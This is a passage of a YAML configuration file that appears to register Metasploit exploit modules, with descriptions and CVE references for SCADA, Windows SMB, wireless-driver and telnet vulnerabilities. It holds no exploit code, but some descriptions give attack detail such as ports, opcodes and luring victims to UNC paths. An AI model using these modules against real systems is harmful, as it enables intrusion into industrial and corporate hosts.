\t\t\t\tthe vulnerability with the Rename command, and uses an egghunter to search for the\n\ + \t\t\t\tshellcode that we sent in stage 1. The use of egghunter appears to be necessary due to\n\ + \t\t\t\tthe small buffer size, which cannot even contain our ROP chain and the final payload.\n\ + \t\t\t" + authors: + - - CVE + - 2011-1567 + - - OSVDB + - "72352" + - - URL + - http://aluigi.altervista.org/adv/igss_5-adv.txt + path: extensions/metasploit/ + class: Msf_module +msf_realwin_on_fc_binfile_a: + enable: true + msf: true + msf_key: windows/scada/realwin_on_fc_binfile_a + name: DATAC RealWin SCADA Server 2 On_FC_CONNECT_FCS_a_FILE Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a vulnerability found in DATAC Control International RealWin\n\ + \t\t\t\tSCADA Server 2.1 and below. By supplying a specially crafted On_FC_BINFILE_FCS_*FILE\n\ + \t\t\t\tpacket via port 910, RealWin will try to create a file (which would be saved to\n\ + \t\t\t\tC:\\Program Files\\DATAC\\Real Win\\RW-version\\filename) by first copying the user-\n\ + \t\t\t\tsupplied filename with a inline memcpy routine without proper bounds checking, which\n\ + \t\t\t\tresults a stack-based buffer overflow, allowing arbitrary remote code execution.\n\n\ + \t\t\t\tTested version: 2.0 (Build 6.1.8.10)\n\ + \t\t\t" + authors: + - - CVE + - 2011-1563 + - - OSVDB + - "72826" + - - BID + - "46937" + - - URL + - http://aluigi.altervista.org/adv/realwin_5-adv.txt + path: extensions/metasploit/ + class: Msf_module +msf_igss9_misc: + enable: true + msf: true + msf_key: windows/scada/igss9_misc + name: 7-Technologies IGSS 9 Data Server/Collector Packet Handling Vulnerabilities + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits multiple vulnerabilities found on IGSS 9's Data Server and\n\ + \t\t\t\tData Collector services. The initial approach is first by transferring our binary\n\ + \t\t\t\twith Write packets (opcode 0x0D) via port 12401 (igssdataserver.exe), and then send\n\ + \t\t\t\tan EXE packet (opcode 0x0A) to port 12397 (dc.exe), which will cause dc.exe to run\n\ + \t\t\t\tthat payload with a CreateProcessA() function as a new thread.\n\ + \t\t\t" + authors: + - - OSVDB + - "72354" + - - OSVDB + - "72349" + - - URL + - http://aluigi.altervista.org/adv/igss_1-adv.txt + - - URL + - http://aluigi.altervista.org/adv/igss_8-adv.txt + path: extensions/metasploit/ + class: Msf_module +msf_factorylink_csservice: + enable: true + msf: true + msf_key: windows/scada/factorylink_csservice + name: Siemens FactoryLink 8 CSService Logging Path Param Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a vulnerability found on Siemens FactoryLink 8. The\n\ + \t\t\t\tvulnerability occurs when CSService.exe processes a CSMSG_ListFiles_REQ message,\n\ + \t\t\t\tthe user-supplied path first gets converted to ANSI format (CodePage 0), and then\n\ + \t\t\t\tgets handled by a logging routine where proper bounds checking is not done,\n\ + \t\t\t\ttherefore causing a stack-based buffer overflow, and results arbitrary code execution.\n\ + \t\t\t" + authors: + - - OSVDB + - "72812" + - - URL + - http://aluigi.altervista.org/adv/factorylink_1-adv.txt + path: extensions/metasploit/ + class: Msf_module +msf_winlog_runtime: + enable: true + msf: true + msf_key: windows/scada/winlog_runtime + name: Sielco Sistemi Winlog Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a buffer overflow in Sielco\n\ + \t\t\t\tSistem Winlog <= 2.07.00. When sending a specially formatted\n\ + \t\t\t\tpacket to the Runtime.exe service, an attacker may be able to\n\ + \t\t\t\texecute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2011-0517 + - - OSVDB + - "70418" + - - URL + - http://aluigi.org/adv/winlog_1-adv.txt + path: extensions/metasploit/ + class: Msf_module +msf_realwin_on_fcs_login: + enable: true + msf: true + msf_key: windows/scada/realwin_on_fcs_login + name: RealWin SCADA Server DATAC Login Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in DATAC Control\n\ + \t\t\t\tInternational RealWin SCADA Server 2.1 (Build 6.0.10.10) or\n\ + \t\t\t\tearlier. By sending a specially crafted On_FC_CONNECT_FCS_LOGIN\n\ + \t\t\t\tpacket containing a long username, an attacker may be able to\n\ + \t\t\t\texecute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2011-1563 + - - OSVDB + - "72824" + - - URL + - http://aluigi.altervista.org/adv/realwin_2-adv.txt + - - URL + - http://www.dataconline.com/software/realwin.php + path: extensions/metasploit/ + class: Msf_module +msf_citect_scada_odbc: + enable: true + msf: true + msf_key: windows/scada/citect_scada_odbc + name: CitectSCADA/CitectFacilities ODBC Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\tThis module exploits a stack buffer overflow in CitectSCADA's ODBC daemon.\n\ + \t\t\t\tThis has only been tested against Citect v5, v6 and v7.\n\ + \t\t\t" + authors: + - - CVE + - 2008-2639 + - - BID + - "29634" + - - OSVDB + - "46105" + - - URL + - http://www.coresecurity.com/content/citect-scada-odbc-service-vulnerability + - - URL + - http://www.auscert.org.au/render.html?it=9433 + - - URL + - http://www.controsys.hu/anyagok/group_quality_assurance.pdf + - - URL + - http://www.citect.com/documents/news_and_media/pr-citect-address-security.pdf + path: extensions/metasploit/ + class: Msf_module +msf_realwin_scpc_txtevent: + enable: true + msf: true + msf_key: windows/scada/realwin_scpc_txtevent + name: DATAC RealWin SCADA Server SCPC_TXTEVENT Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in DATAC Control\n\ + \t\t\t\tInternational RealWin SCADA Server 2.0 (Build 6.1.8.10).\n\ + \t\t\t\tBy sending a specially crafted packet,\n\ + \t\t\t\tan attacker may be able to execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2010-4142 + - - OSVDB + - "68812" + path: extensions/metasploit/ + class: Msf_module +msf_realwin_scpc_initialize_rf: + enable: true + msf: true + msf_key: windows/scada/realwin_scpc_initialize_rf + name: DATAC RealWin SCADA Server SCPC_INITIALIZE_RF Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in DATAC Control\n\ + \t\t\t\tInternational RealWin SCADA Server 2.0 (Build 6.1.8.10).\n\ + \t\t\t\tBy sending a specially crafted packet, an attacker may be able to execute arbitrary code.\n\ + \t\t\t" + authors: + - - OSVDB + - "68812" + - - CVE + - 2010-4142 + - - URL + - http://aluigi.altervista.org/adv/realwin_1-adv.txt + path: extensions/metasploit/ + class: Msf_module +msf_timbuktu_fileupload: + enable: true + msf: true + msf_key: windows/motorola/timbuktu_fileupload + name: Timbuktu Pro Directory Traversal/File Upload + category: Metasploit + description: "\n\ + \t\t\t\tThis module exploits a directory traversal vulnerablity in Motorola's\n\ + \t\t\t\tTimbuktu Pro for Windows 8.6.5.\n\ + \t\t\t" + authors: + - - CVE + - 2008-1117 + - - OSVDB + - "43544" + path: extensions/metasploit/ + class: Msf_module +msf_ms04_031_netdde: + enable: true + msf: true + msf_key: windows/smb/ms04_031_netdde + name: Microsoft NetDDE Service Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in the NetDDE service, which is the\n\ + \t\t\t\tprecursor to the DCOM interface. This exploit effects only operating systems\n\ + \t\t\t\treleased prior to Windows XP SP1 (2000 SP4, XP SP0). Despite Microsoft's claim\n\ + \t\t\t\tthat this vulnerability can be exploited without authentication, the NDDEAPI\n\ + \t\t\t\tpipe is only accessible after successful authentication.\n\ + \t\t\t" + authors: + - - CVE + - 2004-0206 + - - OSVDB + - "10689" + - - BID + - "11372" + - - MSB + - MS04-031 + path: extensions/metasploit/ + class: Msf_module +msf_ms04_011_lsass: + enable: true + msf: true + msf_key: windows/smb/ms04_011_lsass + name: Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in the LSASS service, this vulnerability\n\ + \t\t\t\twas originally found by eEye. When re-exploiting a Windows XP system, you will need\n\ + \t\t\t\tneed to run this module twice. DCERPC request fragmentation can be performed by setting\n\ + \t\t\t\t'FragSize' parameter.\n\ + \t\t\t" + authors: + - - CVE + - 2003-0533 + - - OSVDB + - "5248" + - - BID + - "10108" + - - MSB + - MS04-011 + path: extensions/metasploit/ + class: Msf_module +msf_ms06_070_wkssvc: + enable: true + msf: true + msf_key: windows/smb/ms06_070_wkssvc + name: Microsoft Workstation Service NetpManageIPCConnect Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in the NetApi32 NetpManageIPCConnect\n\ + \t\t\t\tfunction using the Workstation service in Windows 2000 SP4 and Windows XP SP2.\n\n\ + \t\t\t\tIn order to exploit this vulnerability, you must specify a the name of a\n\ + \t\t\t\tvalid Windows DOMAIN. It may be possible to satisfy this condition by using\n\ + \t\t\t\ta custom dns and ldap setup, however that method is not covered here.\n\n\ + \t\t\t\tAlthough Windows XP SP2 is vulnerable, Microsoft reports that Administrator\n\ + \t\t\t\tcredentials are required to reach the vulnerable code. Windows XP SP1 only\n\ + \t\t\t\trequires valid user credentials. Also, testing shows that a machine already\n\ + \t\t\t\tjoined to a domain is not exploitable.\n\ + \t\t\t" + authors: + - - CVE + - 2006-4691 + - - OSVDB + - "30263" + - - BID + - "20985" + - - MSB + - MS06-070 + path: extensions/metasploit/ + class: Msf_module +msf_ms05_039_pnp: + enable: true + msf: true + msf_key: windows/smb/ms05_039_pnp + name: Microsoft Plug and Play Service Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in the Windows Plug\n\ + \t\t\t\tand Play service. This vulnerability can be exploited on\n\ + \t\t\t\tWindows 2000 without a valid user account.\n\n\ + \t\t\t\tNOTE: Since the PnP service runs inside the service.exe process, a failed\n\ + \t\t\t\texploit attempt will cause the system to automatically reboot.\n\ + \t\t\t" + authors: + - - CVE + - 2005-1983 + - - OSVDB + - "18605" + - - BID + - "14513" + - - MSB + - MS05-039 + - - URL + - http://www.hsc.fr/ressources/presentations/null_sessions/ + path: extensions/metasploit/ + class: Msf_module +msf_timbuktu_plughntcommand_bof: + enable: true + msf: true + msf_key: windows/smb/timbuktu_plughntcommand_bof + name: Timbuktu <= 8.6.6 PlughNTCommand Named Pipe Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack based buffer overflow in Timbuktu Pro version <= 8.6.6\n\ + \t\t\t\tin a pretty novel way.\n\n\ + \t\t\t\tThis exploit requires two connections. The first connection is used to leak stack data\n\ + \t\t\t\tusing the buffer overflow to overwrite the nNumberOfBytesToWrite argument. By supplying\n\ + \t\t\t\ta large value for this argument it is possible to cause Timbuktu to reply to the initial\n\ + \t\t\t\trequest with leaked stack data. Using this data allows for reliable exploitation of the\n\ + \t\t\t\tbuffer overflow vulnerability.\n\n\ + \t\t\t\tProps to Infamous41d for helping in finding this exploitation path.\n\n\ + \t\t\t\tThe second connection utilizes the data from the data leak to accurately exploit\n\ + \t\t\t\tthe stack based buffer overflow vulnerability.\n\n\ + \t\t\t\tTODO:\n\ + \t\t\t\thdm suggested using meterpreter's migration capability and restarting the process\n\ + \t\t\t\tfor multishot exploitation.\n\ + \t\t\t" + authors: + - - CVE + - 2009-1394 + - - OSVDB + - "55436" + - - BID + - "35496" + - - URL + - http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=809 + path: extensions/metasploit/ + class: Msf_module +msf_netidentity_xtierrpcpipe: + enable: true + msf: true + msf_key: windows/smb/netidentity_xtierrpcpipe + name: Novell NetIdentity Agent XTIERRPCPIPE Named Pipe Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Novell's NetIdentity Agent. When sending\n\ + \t\t\t\ta specially crafted string to the 'XTIERRPCPIPE' named pipe, an attacker may be\n\ + \t\t\t\table to execute arbitrary code. The success of this module is much greater once the\n\ + \t\t\t\tservice has been restarted.\n\ + \t\t\t" + authors: + - - CVE + - 2009-1350 + - - OSVDB + - "53351" + - - BID + - "34400" + - - URL + - http://www.reversemode.com/index.php?option=com_content&task=view&id=62&Itemid=1 + path: extensions/metasploit/ + class: Msf_module +msf_ms06_025_rasmans_reg: + enable: true + msf: true + msf_key: windows/smb/ms06_025_rasmans_reg + name: Microsoft RRAS Service RASMAN Registry Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a registry-based stack buffer overflow in the Windows Routing\n\ + \t\t\t\tand Remote Access Service. Since the service is hosted inside svchost.exe,\n\ + \t\t\t\ta failed exploit attempt can cause other system services to fail as well.\n\ + \t\t\t\tA valid username and password is required to exploit this flaw on Windows 2000.\n\ + \t\t\t\tWhen attacking XP SP1, the SMBPIPE option needs to be set to 'SRVSVC'.\n\ + \t\t\t\tExploiting this flaw involves two distinct steps - creating the registry key\n\ + \t\t\t\tand then triggering an overwrite based on a read of this key. Once the key is\n\ + \t\t\t\tcreated, it cannot be recreated. This means that for any given system, you\n\ + \t\t\t\tonly get one chance to exploit this flaw. Picking the wrong target will require\n\ + \t\t\t\ta manual removal of the following registry key before you can try again:\n\ + \t\t\t\tHKEY_USERS\\.DEFAULT\\Software\\Microsoft\\RAS Phonebook\n\ + \t\t\t" + authors: + - - CVE + - 2006-2370 + - - OSVDB + - "26437" + - - BID + - "18325" + - - MSB + - MS06-025 + path: extensions/metasploit/ + class: Msf_module +msf_ms09_050_smb2_negotiate_func_index: + enable: true + msf: true + msf_key: windows/smb/ms09_050_smb2_negotiate_func_index + name: Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits an out of bounds function table dereference in the SMB\n\ + \t\t\t\trequest validation code of the SRV2.SYS driver included with Windows Vista, Windows 7\n\ + \t\t\t\trelease candidates (not RTM), and Windows 2008 Server prior to R2. Windows Vista\n\ + \t\t\t\twithout SP1 does not seem affected by this flaw.\n\ + \t\t\t" + authors: + - - MSB + - MS09-050 + - - CVE + - 2009-3103 + - - BID + - "36299" + - - OSVDB + - "57799" + - - URL + - http://seclists.org/fulldisclosure/2009/Sep/0039.html + - - URL + - http://www.microsoft.com/technet/security/Bulletin/MS09-050.mspx + path: extensions/metasploit/ + class: Msf_module +msf_ms04_007_killbill: + enable: true + msf: true + msf_key: windows/smb/ms04_007_killbill + name: Microsoft ASN.1 Library Bitstring Heap Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis is an exploit for a previously undisclosed\n\ + \t\t\t\tvulnerability in the bit string decoding code in the\n\ + \t\t\t\tMicrosoft ASN.1 library. This vulnerability is not related\n\ + \t\t\t\tto the bit string vulnerability described in eEye advisory\n\ + \t\t\t\tAD20040210-2. Both vulnerabilities were fixed in the\n\ + \t\t\t\tMS04-007 patch.\n\n\ + \t\t\t\tYou are only allowed one attempt with this vulnerability. If\n\ + \t\t\t\tthe payload fails to execute, the LSASS system service will\n\ + \t\t\t\tcrash and the target system will automatically reboot itself\n\ + \t\t\t\tin 60 seconds. If the payload succeeeds, the system will no\n\ + \t\t\t\tlonger be able to process authentication requests, denying\n\ + \t\t\t\tall attempts to login through SMB or at the console. A\n\ + \t\t\t\treboot is required to restore proper functioning of an\n\ + \t\t\t\texploited system.\n\n\ + \t\t\t\tThis exploit has been successfully tested with the win32/*/reverse_tcp\n\ + \t\t\t\tpayloads, however a few problems were encounted when using the\n\ + \t\t\t\tequivalent bind payloads. Your mileage may vary.\n\n\ + \t\t\t" + authors: + - - CVE + - 2003-0818 + - - OSVDB + - "3902" + - - BID + - "9633" + - - URL + - http://www.phreedom.org/solar/exploits/msasn1-bitstring/ + - - MSB + - MS04-007 + path: extensions/metasploit/ + class: Msf_module +msf_ms03_049_netapi: + enable: true + msf: true + msf_key: windows/smb/ms03_049_netapi + name: Microsoft Workstation Service NetAddAlternateComputerName Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in the NetApi32 NetAddAlternateComputerName\n\ + \t\t\t\tfunction using the Workstation service in Windows XP.\n\ + \t\t\t" + authors: + - - CVE + - 2003-0812 + - - OSVDB + - "11461" + - - BID + - "9011" + - - MSB + - MS03-049 + path: extensions/metasploit/ + class: Msf_module +msf_ms06_025_rras: + enable: true + msf: true + msf_key: windows/smb/ms06_025_rras + name: Microsoft RRAS Service Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in the Windows Routing and Remote\n\ + \t\t\t\tAccess Service. Since the service is hosted inside svchost.exe, a failed\n\ + \t\t\t\texploit attempt can cause other system services to fail as well. A valid\n\ + \t\t\t\tusername and password is required to exploit this flaw on Windows 2000.\n\ + \t\t\t\tWhen attacking XP SP1, the SMBPIPE option needs to be set to 'SRVSVC'.\t\t\t" + authors: + - - CVE + - 2006-2370 + - - OSVDB + - "26437" + - - BID + - "18325" + - - MSB + - MS06-025 + path: extensions/metasploit/ + class: Msf_module +msf_ms06_066_nwapi: + enable: true + msf: true + msf_key: windows/smb/ms06_066_nwapi + name: Microsoft Services MS06-066 nwapi32.dll + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in the svchost service, when the netware\n\ + \t\t\t\tclient service is running. This specific vulnerability is in the nwapi32.dll module.\n\ + \t\t\t" + authors: + - - CVE + - 2006-4688 + - - OSVDB + - "30260" + - - BID + - "21023" + - - MSB + - MS06-066 + path: extensions/metasploit/ + class: Msf_module +msf_ms06_066_nwwks: + enable: true + msf: true + msf_key: windows/smb/ms06_066_nwwks + name: Microsoft Services MS06-066 nwwks.dll + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in the svchost service, when the netware\n\ + \t\t\t\tclient service is running. This specific vulnerability is in the nwapi32.dll module.\n\ + \t\t\t" + authors: + - - CVE + - 2006-4688 + - - OSVDB + - "30260" + - - BID + - "21023" + - - MSB + - MS06-066 + path: extensions/metasploit/ + class: Msf_module +msf_ms10_061_spoolss: + enable: true + msf: true + msf_key: windows/smb/ms10_061_spoolss + name: Microsoft Print Spooler Service Impersonation Vulnerability + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits the RPC service impersonation vulnerability detailed in\n\ + \t\t\t\tMicrosoft Bulletin MS10-061. By making a specific DCE RPC request to the\n\ + \t\t\t\tStartDocPrinter procedure, an attacker can impersonate the Printer Spooler service\n\ + \t\t\t\tto create a file. The working directory at the time is %SystemRoot%\\system32.\n\ + \t\t\t\tAn attacker can specify any file name, including directory traversal or full paths.\n\ + \t\t\t\tBy sending WritePrinter requests, an attacker can fully control the content of\n\ + \t\t\t\tthe created file.\n\n\ + \t\t\t\tIn order to gain code execution, this module writes to a directory used by Windows\n\ + \t\t\t\tManagement Instrumentation (WMI) to deploy applications. This directory (Wbem\\Mof)\n\ + \t\t\t\tis periodically scanned and any new .mof files are processed automatically. This is\n\ + \t\t\t\tthe same technique employed by the Stuxnet code found in the wild.\n\ + \t\t\t" + authors: + - - OSVDB + - "67988" + - - CVE + - 2010-2729 + - - MSB + - MS10-061 + path: extensions/metasploit/ + class: Msf_module +msf_psexec: + enable: true + msf: true + msf_key: windows/smb/psexec + name: Microsoft Windows Authenticated User Code Execution + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module uses a valid administrator username and password (or\n\ + \t\t\t\tpassword hash) to execute an arbitrary payload. This module is similar\n\ + \t\t\t\tto the \"psexec\" utility provided by SysInternals. This module is now able\n\ + \t\t\t\tto clean up after itself. The service created by this tool uses a randomly \n\ + \t\t\t\tchosen name and description.\n\ + \t\t\t" + authors: + - - CVE + - 1999-0504 + - - OSVDB + - "3106" + - - URL + - http://www.microsoft.com/technet/sysinternals/utilities/psexec.mspx + path: extensions/metasploit/ + class: Msf_module +msf_smb_relay: + enable: true + msf: true + msf_key: windows/smb/smb_relay + name: Microsoft Windows SMB Relay Code Execution + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module will relay SMB authentication requests to another\n\ + \t\t\t\thost, gaining access to an authenticated SMB session if successful.\n\ + \t\t\t\tIf the connecting user is an administrator and network logins are\n\ + \t\t\t\tallowed to the target machine, this module will execute an arbitrary\n\ + \t\t\t\tpayload. To exploit this, the target system\tmust try to\tauthenticate\n\ + \t\t\t\tto this module. The easiest way to force a SMB authentication attempt\n\ + \t\t\t\tis by embedding a UNC path (\\\\SERVER\\SHARE) into a web page or\n\ + \t\t\t\temail message. When the victim views the web page or email, their\n\ + \t\t\t\tsystem will automatically connect to the server specified in the UNC\n\ + \t\t\t\tshare (the IP address of the system running this module) and attempt\n\ + \t\t\t\tto authenticate. Unfortunately, this\n\ + \t\t\t\tmodule is not able to clean up after itself. The service and payload\n\ + \t\t\t\tfile listed in the output will need to be manually removed after access\n\ + \t\t\t\thas been gained. The service created by this tool uses a randomly chosen\n\ + \t\t\t\tname and description, so the services list can become cluttered after\n\ + \t\t\t\trepeated exploitation.\n\n\ + \t\t\t\tThe SMB authentication relay attack was first reported by Sir Dystic on\n\ + \t\t\t\tMarch 31st, 2001 at @lanta.con in Atlanta, Georgia.\n\n\ + \t\t\t\tOn November 11th 2008 Microsoft released bulletin MS08-068. This bulletin\n\ + \t\t\t\tincludes a patch which prevents the relaying of challenge keys back to\n\ + \t\t\t\tthe host which issued them, preventing this exploit from working in\n\ + \t\t\t\tthe default configuration. It is still possible to set the SMBHOST\n\ + \t\t\t\tparameter to a third-party host that the victim is authorized to access,\n\ + \t\t\t\tbut the \"reflection\" attack has been effectively broken.\n\ + \t\t\t" + authors: + - - CVE + - 2008-4037 + - - OSVDB + - "49736" + - - MSB + - MS08-068 + - - URL + - http://blogs.technet.com/swi/archive/2008/11/11/smb-credential-reflection.aspx + - - URL + - http://en.wikipedia.org/wiki/SMBRelay + - - URL + - http://www.microsoft.com/technet/sysinternals/utilities/psexec.mspx + - - URL + - http://www.xfocus.net/articles/200305/smbrelay.html + path: extensions/metasploit/ + class: Msf_module +msf_ms08_067_netapi: + enable: true + msf: true + msf_key: windows/smb/ms08_067_netapi + name: Microsoft Server Service Relative Path Stack Corruption + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a parsing flaw in the path canonicalization code of\n\ + \t\t\t\tNetAPI32.dll through the Server Service. This module is capable of bypassing\n\ + \t\t\t\tNX on some operating systems and service packs. The correct target must be\n\ + \t\t\t\tused to prevent the Server Service (along with a dozen others in the same\n\ + \t\t\t\tprocess) from crashing. Windows XP targets seem to handle multiple successful\n\ + \t\t\t\texploitation events, but 2003 targets will often crash or hang on subsequent\n\ + \t\t\t\tattempts. This is just the first version of this module, full support for\n\ + \t\t\t\tNX bypass on 2003, along with other platforms, is still in development.\n\ + \t\t\t" + authors: + - - CVE + - 2008-4250 + - - OSVDB + - "49243" + - - MSB + - MS08-067 + - - NEXPOSE + - dcerpc-ms-netapi-netpathcanonicalize-dos + path: extensions/metasploit/ + class: Msf_module +msf_ms06_040_netapi: + enable: true + msf: true + msf_key: windows/smb/ms06_040_netapi + name: Microsoft Server Service NetpwPathCanonicalize Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in the NetApi32 CanonicalizePathName() function\n\ + \t\t\t\tusing the NetpwPathCanonicalize RPC call in the Server Service. It is likely that\n\ + \t\t\t\tother RPC calls could be used to exploit this service. This exploit will result in\n\ + \t\t\t\ta denial of service on Windows XP SP2 or Windows 2003 SP1. A failed exploit attempt\n\ + \t\t\t\twill likely result in a complete reboot on Windows 2000 and the termination of all\n\ + \t\t\t\tSMB-related services on Windows XP. The default target for this exploit should succeed\n\ + \t\t\t\ton Windows NT 4.0, Windows 2000 SP0-SP4+, Windows XP SP0-SP1 and Windows 2003 SP0.\n\ + \t\t\t" + authors: + - - CVE + - 2006-3439 + - - OSVDB + - "27845" + - - BID + - "19409" + - - MSB + - MS06-040 + path: extensions/metasploit/ + class: Msf_module +msf_netgear_wg111_beacon: + enable: true + msf: true + msf_key: windows/driver/netgear_wg111_beacon + name: NetGear WG111v2 Wireless Driver Long Beacon Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in the NetGear WG111v2 wireless\n\ + \t\t\t\tdevice driver. This stack buffer overflow allows remote code execution in kernel mode.\n\ + \t\t\t\tThe stack buffer overflow is triggered when a 802.11 Beacon frame is received that\n\ + \t\t\t\tcontains more than 1100 bytes worth of information elements.\n\n\ + \t\t\t\tThis exploit was tested with version 5.1213.6.316 of the WG111v2.SYS driver and\n\ + \t\t\t\ta NetGear WG111v2 USB adapter. Since this vulnerability is exploited via beacon frames,\n\ + \t\t\t\tall cards within range of the attack will be affected. The tested adapter used\n\ + \t\t\t\ta MAC address in the range of 00:18:4d:02:XX:XX.\n\n\ + \t\t\t\tVulnerable clients will need to have their card in a non-associated state\n\ + \t\t\t\tfor this exploit to work. The easiest way to reproduce this bug is by starting\n\ + \t\t\t\tthe exploit and then unplugging and reinserting the USB card. The exploit can\n\ + \t\t\t\ttake up to a minute to execute the payload, depending on system activity.\n\n\ + \t\t\t\tNetGear was NOT contacted about this flaw. A search of the SecurityFocus\n\ + \t\t\t\tdatabase indicates that NetGear has not provided an official patch or\n\ + \t\t\t\tsolution for any of the thirty flaws listed at the time of writing. This list\n\ + \t\t\t\tincludes BIDs: 1010, 3876, 4024, 4111, 5036, 5667, 5830, 5943, 5940, 6807, 7267, 7270,\n\ + \t\t\t\t7371, 7367, 9194, 10404, 10459, 10585, 10935, 11580, 11634, 12447, 15816, 16837,\n\ + \t\t\t\t16835, 19468, and 19973.\n\n\ + \t\t\t\tThis module depends on the Lorcon2 library and only works on the Linux platform\n\ + \t\t\t\twith a supported wireless card. Please see the Ruby Lorcon2 documentation\n\ + \t\t\t\t(external/ruby-lorcon/README) for more information.\n\ + \t\t\t" + authors: + - - CVE + - 2006-5972 + - - OSVDB + - "30473" + - - URL + - http://projects.info-pull.com/mokb/MOKB-16-11-2006.html + path: extensions/metasploit/ + class: Msf_module +msf_broadcom_wifi_ssid: + enable: true + msf: true + msf_key: windows/driver/broadcom_wifi_ssid + name: Broadcom Wireless Driver Probe Response SSID Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in the Broadcom Wireless driver\n\ + \t\t\t\tthat allows remote code execution in kernel mode by sending a 802.11 probe\n\ + \t\t\t\tresponse that contains a long SSID. The target MAC address must\n\ + \t\t\t\tbe provided to use this exploit. The two cards tested fell into the\n\ + \t\t\t\t00:14:a5:06:XX:XX and 00:14:a4:2a:XX:XX ranges.\n\n\ + \t\t\t\tThis module depends on the Lorcon2 library and only works on the Linux platform\n\ + \t\t\t\twith a supported wireless card. Please see the Ruby Lorcon2 documentation\n\ + \t\t\t\t(external/ruby-lorcon/README) for more information.\n\ + \t\t\t" + authors: + - - CVE + - 2006-5882 + - - OSVDB + - "30294" + - - URL + - http://projects.info-pull.com/mokb/MOKB-11-11-2006.html + path: extensions/metasploit/ + class: Msf_module +msf_dlink_wifi_rates: + enable: true + msf: true + msf_key: windows/driver/dlink_wifi_rates + name: D-Link DWL-G132 Wireless Driver Beacon Rates Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in the A5AGU.SYS driver provided\n\ + \t\t\t\twith the D-Link DWL-G132 USB wireless adapter. This stack buffer overflow\n\ + \t\t\t\tallows remote code execution in kernel mode. The stack buffer overflow is triggered\n\ + \t\t\t\twhen a 802.11 Beacon frame is received that contains a long Rates information\n\ + \t\t\t\telement. This exploit was tested with version 1.0.1.41 of the\n\ + \t\t\t\tA5AGU.SYS driver and a D-Link DWL-G132 USB adapter (HW: A2, FW: 1.02). Newer\n\ + \t\t\t\tversions of the A5AGU.SYS driver are provided with the D-Link WUA-2340\n\ + \t\t\t\tadapter and appear to resolve this flaw, but D-Link does not offer an updated\n\ + \t\t\t\tdriver for the DWL-G132. Since this vulnerability is exploited via beacon frames,\n\ + \t\t\t\tall cards within range of the attack will be affected. The tested adapter used\n\ + \t\t\t\ta MAC address in the range of 00:11:95:f2:XX:XX.\n\n\ + \t\t\t\tVulnerable clients will need to have their card in a non-associated state\n\ + \t\t\t\tfor this exploit to work. The easiest way to reproduce this bug is by starting\n\ + \t\t\t\tthe exploit and then accessing the Windows wireless network browser and\n\ + \t\t\t\tforcing it to refresh.\n\n\ + \t\t\t\tD-Link was NOT contacted about this flaw. A search of the SecurityFocus\n\ + \t\t\t\tdatabase indicates that D-Link has not provided an official patch or\n\ + \t\t\t\tsolution for any of the seven flaws listed at the time of writing:\n\ + \t\t\t\t(BIDs 13679, 16621, 16690, 18168, 18299, 19006, and 20689).\n\n\ + \t\t\t\tAs of November 17th, 2006, D-Link has fixed the flaw it the latest version of the\n\ + \t\t\t\tDWL-G132 driver (v1.21).\n\n\ + \t\t\t\tThis module depends on the Lorcon2 library and only works on the Linux platform\n\ + \t\t\t\twith a supported wireless card. Please see the Ruby Lorcon2 documentation\n\ + \t\t\t\t(external/ruby-lorcon/README) for more information.\n\ + \t\t\t" + authors: + - - CVE + - 2006-6055 + - - OSVDB + - "30296" + - - URL + - http://projects.info-pull.com/mokb/MOKB-13-11-2006.html + - - URL + - ftp://ftp.dlink.com/Wireless/dwlg132/Driver/DWLG132_driver_102.zip + path: extensions/metasploit/ + class: Msf_module +msf_goodtech_telnet: + enable: true + msf: true + msf_key: windows/telnet/goodtech_telnet + name: GoodTech Telnet Server <= 5.0.6 Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in GoodTech Systems Telnet Server\n\ + \t\t\t\tversions prior to 5.0.7. By sending an overly long string, an attacker can\n\ + \t\t\t\toverwrite the buffer and control program execution.\n\ + \t\t\t" + authors: + - - CVE + - 2005-0768 + - - OSVDB + - "14806" + - - BID + - "12815" + 